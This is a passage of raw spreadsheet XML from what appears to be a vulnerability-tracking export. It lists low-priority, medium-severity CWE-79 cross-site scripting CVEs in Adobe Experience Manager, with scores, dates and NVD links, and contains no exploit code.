/><c r="R1367" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S136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7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71565</t></is></c></row><row r="1368"><c r="A1368" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1368" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1368" s="5" t="inlineStr"><is><t>CVE-2026-72626</t></is></c><c r="D1368" s="5" t="n"><v>5.4</v></c><c r="E1368" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1368" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1368" s="5" t="inlineStr" /><c r="H1368" s="5" t="n"><v>0.002</v></c><c r="I1368" s="5" t="inlineStr" /><c r="J1368" s="5" t="inlineStr" /><c r="K1368" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1368" s="5" t="inlineStr" /><c r="M1368" s="5" t="inlineStr" /><c r="N1368" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1368" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1368" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1368" s="5" t="inlineStr" /><c r="R1368" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S136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8" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72626</t></is></c></row><row r="1369"><c r="A1369" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1369" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1369" s="5" t="inlineStr"><is><t>CVE-2026-72627</t></is></c><c r="D1369" s="5" t="n"><v>5.4</v></c><c r="E1369" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1369" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1369" s="5" t="inlineStr" /><c r="H1369" s="5" t="n"><v>0.002</v></c><c r="I1369" s="5" t="inlineStr" /><c r="J1369" s="5" t="inlineStr" /><c r="K1369" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1369" s="5" t="inlineStr" /><c r="M1369" s="5" t="inlineStr" /><c r="N1369" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1369" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1369" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1369" s="5" t="inlineStr" /><c r="R1369" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S136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69" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72627</t></is></c></row><row r="1370"><c r="A1370" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1370" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1370" s="5" t="inlineStr"><is><t>CVE-2026-75629</t></is></c><c r="D1370" s="5" t="n"><v>5.4</v></c><c r="E1370" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1370" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1370" s="5" t="inlineStr" /><c r="H1370" s="5" t="n"><v>0.002</v></c><c r="I1370" s="5" t="inlineStr" /><c r="J1370" s="5" t="inlineStr" /><c r="K1370" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1370" s="5" t="inlineStr" /><c r="M1370" s="5" t="inlineStr" /><c r="N1370" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1370" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1370" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1370" s="5" t="inlineStr" /><c r="R1370" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S137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0" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75629</t></is></c></row><row r="1371"><c r="A1371" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1371" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1371" s="5" t="inlineStr"><is><t>CVE-2026-75635</t></is></c><c r="D1371" s="5" t="n"><v>5.4</v></c><c r="E1371" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1371" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1371" s="5" t="inlineStr" /><c r="H1371" s="5" t="n"><v>0.002</v></c><c r="I1371" s="5" t="inlineStr" /><c r="J1371" s="5" t="inlineStr" /><c r="K1371" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1371" s="5" t="inlineStr" /><c r="M1371" s="5" t="inlineStr" /><c r="N1371" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1371" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1371" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1371" s="5" t="inlineStr" /><c r="R1371" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S137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1" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75635</t></is></c></row><row r="1372"><c r="A1372" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1372" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1372" s="5" t="inlineStr"><is><t>CVE-2026-75636</t></is></c><c r="D1372" s="5" t="n"><v>5.4</v></c><c r="E1372" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1372" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1372" s="5" t="inlineStr" /><c r="H1372" s="5" t="n"><v>0.002</v></c><c r="I1372" s="5" t="inlineStr" /><c r="J1372" s="5" t="inlineStr" /><c r="K1372" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1372" s="5" t="inlineStr" /><c r="M1372" s="5" t="inlineStr" /><c r="N1372" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1372" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1372" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1372" s="5" t="inlineStr" /><c r="R1372" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S137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2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75636</t></is></c></row><row r="1373"><c r="A1373" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1373" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1373" s="5" t="inlineStr"><is><t>CVE-2026-75637</t></is></c><c r="D1373" s="5" t="n"><v>5.4</v></c><c r="E1373" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1373" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1373" s="5" t="inlineStr" /><c r="H1373" s="5" t="n"><v>0.003</v></c><c r="I1373" s="5" t="inlineStr" /><c r="J1373" s="5" t="inlineStr" /><c r="K1373" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1373" s="5" t="inlineStr" /><c r="M1373" s="5" t="inlineStr" /><c r="N1373" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1373" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1373" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1373" s="5" t="inlineStr" /><c r="R1373" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S137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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75637</t></is></c></row><row r="1374"><c r="A1374" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1374" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1374" s="5" t="inlineStr"><is><t>CVE-2026-75639</t></is></c><c r="D1374" s="5" t="n"><v>5.4</v></c><c r="E1374" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1374" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1374" s="5" t="inlineStr" /><c r="H1374" s="5" t="n"><v>0.002</v></c><c r="I1374" s="5" t="inlineStr" /><c r="J1374" s="5" t="inlineStr" /><c r="K1374" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1374" s="5" t="inlineStr" /><c r="M1374" s="5" t="inlineStr" /><c r="N1374" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1374" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1374" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1374" s="5" t="inlineStr" /><c r="R1374" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S137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4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75639</t></is></c></row><row r="1375"><c r="A1375" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1375" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1375" s="5" t="inlineStr"><is><t>CVE-2026-75640</t></is></c><c r="D1375" s="5" t="n"><v>5.4</v></c><c r="E1375" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1375" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1375" s="5" t="inlineStr" /><c r="H1375" s="5" t="n"><v>0.002</v></c><c r="I1375" s="5" t="inlineStr" /><c r="J1375" s="5" t="inlineStr" /><c r="K1375" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1375" s="5" t="inlineStr" /><c r="M1375" s="5" t="inlineStr" /><c r="N1375" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1375" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1375" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1375" s="5" t="inlineStr" /><c r="R1375" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S137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5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75640</t></is></c></row><row r="1376"><c r="A1376" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1376" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1376" s="5" t="inlineStr"><is><t>CVE-2026-75642</t></is></c><c r="D1376" s="5" t="n"><v>5.4</v></c><c r="E1376" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1376" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1376" s="5" t="inlineStr" /><c r="H1376" s="5" t="n"><v>0.002</v></c><c r="I1376" s="5" t="inlineStr" /><c r="J1376" s="5" t="inlineStr" /><c r="K1376" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1376" s="5" t="inlineStr" /><c r="M1376" s="5" t="inlineStr" /><c r="N1376" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1376" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1376" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1376" s="5" t="inlineStr" /><c r="R1376" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S137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76" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75642</t></is></c></row><row r="1377"><c r="A1377" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1377" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1377" s="5" t="inlineStr"><is><t>CVE-2026-75643</t></is></c><c r="D1377" s="5" t="n"><v>5.4</v></c><c r="E1377" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1377" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1377" s="5" t="inlineStr" /><c r="H1377" s="5" t="n"><v>0.002</v></c><c r="I1377" s="5" t="inlineStr" /><c r="J1377" s="5" t="inlineStr" /><c r="K1377" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1377" s="5" t="inlineStr" /><c r="M1377" s="5" t="inlineStr" /><c r="N1377" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1377" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1377" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1377" s="5" t="inlineStr" /><c r="R1377" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S137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77" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75643</t></is></c></row><row r="1378"><c r="A1378" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1378" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1378" s="5" t="inlineStr"><is><t>CVE-2026-75644</t></is></c><c r="D1378" s="5" t="n"><v>5.4</v></c><c r="E1378" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1378" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1378" s="5" t="inlineStr" /><c r="H1378" s="5" t="n"><v>0.002</v></c><c r="I1378" s="5" t="inlineStr" /><c r="J1378" s="5" t="inlineStr" /><c r="K1378" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1378" s="5" t="inlineStr" /><c r="M1378" s="5" t="inlineStr" /><c r="N1378" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1378" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1378" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1378" s="5" t="inlineStr" /><c r="R1378" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S137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378" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75644</t></is></c></row><row r="1379"><c r="A1379" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1379" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1379" s="5" t="inlineStr"><is><t>CVE-2026-75646</t></is></c><c r="D1379" s="5" t="n"><v>5.4</v></c><c r="E1379" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1379" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1379" s="5" t="inlineStr" /><c r="H1379" s="5" t="n"><v>0.002</v></c><c r="I1379" s="5" t="inlineStr" /><c r="J1379" s="5" t="inlineStr" /><c r="K1379" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1379" s="5" t="inlineStr" /><c r="M1379" s="5" t="inlineStr" /><c r="N1379" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1379" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1379" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1379" s="5" t="inlineStr" /><c r="R1379" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S137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79" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75646</t></is></c></row><row r="1380"><c r="A1380" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1380" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1380" s="5" t="inlineStr"><is><t>CVE-2026-75647</t></is></c><c r="D1380" s="5" t="n"><v>5.4</v></c><c r="E1380" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1380" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1380" s="5" t="inlineStr" /><c r="H1380" s="5" t="n"><v>0.002</v></c><c r="I1380" s="5" t="inlineStr" /><c r="J1380" s="5" t="inlineStr" /><c r="K1380" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1380" s="5" t="inlineStr" /><c r="M1380" s="5" t="inlineStr" /><c r="N1380" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1380" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1380" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1380" s="5" t="inlineStr" /><c r="R1380" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S138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0" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75647</t></is></c></row><row r="1381"><c r="A1381" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1381" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1381" s="5" t="inlineStr"><is><t>CVE-2026-75651</t></is></c><c r="D1381" s="5" t="n"><v>5.4</v></c><c r="E1381" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1381" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1381" s="5" t="inlineStr" /><c r="H1381" s="5" t="n"><v>0.002</v></c><c r="I1381" s="5" t="inlineStr" /><c r="J1381" s="5" t="inlineStr" /><c r="K1381" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1381" s="5" t="inlineStr" /><c r="M1381" s="5" t="inlineStr" /><c r="N1381" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1381" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1381" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1381" s="5" t="inlineStr" /><c r="R1381" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S138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1" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75651</t></is></c></row><row r="1382"><c r="A1382" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1382" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1382" s="5" t="inlineStr"><is><t>CVE-2026-75652</t></is></c><c r="D1382" s="5" t="n"><v>5.4</v></c><c r="E1382" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1382" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1382" s="5" t="inlineStr" /><c r="H1382" s="5" t="n"><v>0.002</v></c><c r="I1382" s="5" t="inlineStr" /><c r="J1382" s="5" t="inlineStr" /><c r="K1382" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1382" s="5" t="inlineStr" /><c r="M1382" s="5" t="inlineStr" /><c r="N1382" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1382" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1382" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1382" s="5" t="inlineStr" /><c r="R1382" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S138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2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75652</t></is></c></row><row r="1383"><c r="A1383" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1383" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1383" s="5" t="inlineStr"><is><t>CVE-2026-75657</t></is></c><c r="D1383" s="5" t="n"><v>5.4</v></c><c r="E1383" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1383" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1383" s="5" t="inlineStr" /><c r="H1383" s="5" t="n"><v>0.002</v></c><c r="I1383" s="5" t="inlineStr" /><c r="J1383" s="5" t="inlineStr" /><c r="K1383" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1383" s="5" t="inlineStr" /><c r="M1383" s="5" t="inlineStr" /><c r="N1383" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1383" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1383" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1383" s="5" t="inlineStr" /><c r="R1383" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S138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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75657</t></is></c></row><row r="1384"><c r="A1384" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1384" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1384" s="5" t="inlineStr"><is><t>CVE-2026-75659</t></is></c><c r="D1384" s="5" t="n"><v>5.4</v></c><c r="E1384" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1384" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1384" s="5" t="inlineStr" /><c r="H1384" s="5" t="n"><v>0.002</v></c><c r="I1384" s="5" t="inlineStr" /><c r="J1384" s="5" t="inlineStr" /><c r="K1384" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1384" s="5" t="inlineStr" /><c r="M1384" s="5" t="inlineStr" /><c r="N1384" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1384" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1384" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1384" s="5" t="inlineStr" /><c r="R1384" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S138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4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75659</t></is></c></row><row r="1385"><c r="A1385" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1385" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1385" s="5" t="inlineStr"><is><t>CVE-2026-75660</t></is></c><c r="D1385" s="5" t="n"><v>5.4</v></c><c r="E1385" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1385" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1385" s="5" t="inlineStr" /><c r="H1385" s="5" t="n"><v>0.002</v></c><c r="I1385" s="5" t="inlineStr" /><c r="J1385" s="5" t="inlineStr" /><c r="K1385" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1385" s="5" t="inlineStr" /><c r="M1385" s="5" t="inlineStr" /><c r="N1385" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1385" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1385" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1385" s="5" t="inlineStr" /><c r="R1385" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S138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5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75660</t></is></c></row><row r="1386"><c r="A1386" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1386" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1386" s="5" t="inlineStr"><is><t>CVE-2026-75661</t></is></c><c r="D1386" s="5" t="n"><v>5.4</v></c><c r="E1386" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1386" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1386" s="5" t="inlineStr" /><c r="H1386" s="5" t="n"><v>0.003</v></c><c r="I1386" s="5" t="inlineStr" /><c r="J1386" s="5" t="inlineStr" /><c r="K1386" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1386" s="5" t="inlineStr" /><c r="M1386" s="5" t="inlineStr" /><c r="N1386" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1386" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1386" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1386" s="5" t="inlineStr" /><c r="R1386" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S138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6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75661</t></is></c></row><row r="1387"><c r="A1387" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1387" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1387" s="5" t="inlineStr"><is><t>CVE-2026-75666</t></is></c><c r="D1387" s="5" t="n"><v>5.4</v></c><c r="E1387" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1387" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1387" s="5" t="inlineStr" /><c r="H1387" s="5" t="n"><v>0.003</v></c><c r="I1387" s="5" t="inlineStr" /><c r="J1387" s="5" t="inlineStr" /><c r="K1387" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1387" s="5" t="inlineStr" /><c r="M1387" s="5" t="inlineStr" /><c r="N1387" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1387" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1387" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1387" s="5" t="inlineStr" /><c r="R1387" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S138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7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75666</t></is></c></row><row r="1388"><c r="A1388" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1388" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1388" s="5" t="inlineStr"><is><t>CVE-2026-75667</t></is></c><c r="D1388" s="5" t="n"><v>5.4</v></c><c r="E1388" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1388" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1388" s="5" t="inlineStr" /><c r="H1388" s="5" t="n"><v>0.003</v></c><c r="I1388" s="5" t="inlineStr" /><c r="J1388" s="5" t="inlineStr" /><c r="K1388" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1388" s="5" t="inlineStr" /><c r="M1388" s="5" t="inlineStr" /><c r="N1388" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1388" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1388" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1388" s="5" t="inlineStr" /><c r="R1388" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S138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8" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75667</t></is></c></row><row r="1389"><c r="A1389" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1389" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1389" s="5" t="inlineStr"><is><t>CVE-2026-75668</t></is></c><c r="D1389" s="5" t="n"><v>5.4</v></c><c r="E1389" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1389" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1389" s="5" t="inlineStr" /><c r="H1389" s="5" t="n"><v>0.003</v></c><c r="I1389" s="5" t="inlineStr" /><c r="J1389" s="5" t="inlineStr" /><c r="K1389" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1389" s="5" t="inlineStr" /><c r="M1389" s="5" t="inlineStr" /><c r="N1389" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1389" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1389" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1389" s="5" t="inlineStr" /><c r="R1389" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S138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89" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75668</t></is></c></row><row r="1390"><c r="A1390" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1390" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1390" s="5" t="inlineStr"><is><t>CVE-2026-75669</t></is></c><c r="D1390" s="5" t="n"><v>5.4</v></c><c r="E1390" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1390" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1390" s="5" t="inlineStr" /><c r="H1390" s="5" t="n"><v>0.003</v></c><c r="I1390" s="5" t="inlineStr" /><c r="J1390" s="5" t="inlineStr" /><c r="K1390" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1390" s="5" t="inlineStr" /><c r="M1390" s="5" t="inlineStr" /><c r="N1390" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1390" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1390" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1390" s="5" t="inlineStr" /><c r="R1390" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S139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0" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75669</t></is></c></row><row r="1391"><c r="A1391" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1391" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1391" s="5" t="inlineStr"><is><t>CVE-2026-75670</t></is></c><c r="D1391" s="5" t="n"><v>5.4</v></c><c r="E1391" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1391" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1391" s="5" t="inlineStr" /><c r="H1391" s="5" t="n"><v>0.003</v></c><c r="I1391" s="5" t="inlineStr" /><c r="J1391" s="5" t="inlineStr" /><c r="K1391" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1391" s="5" t="inlineStr" /><c r="M1391" s="5" t="inlineStr" /><c r="N1391" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1391" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1391" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1391" s="5" t="inlineStr" /><c r="R1391" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S139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1" 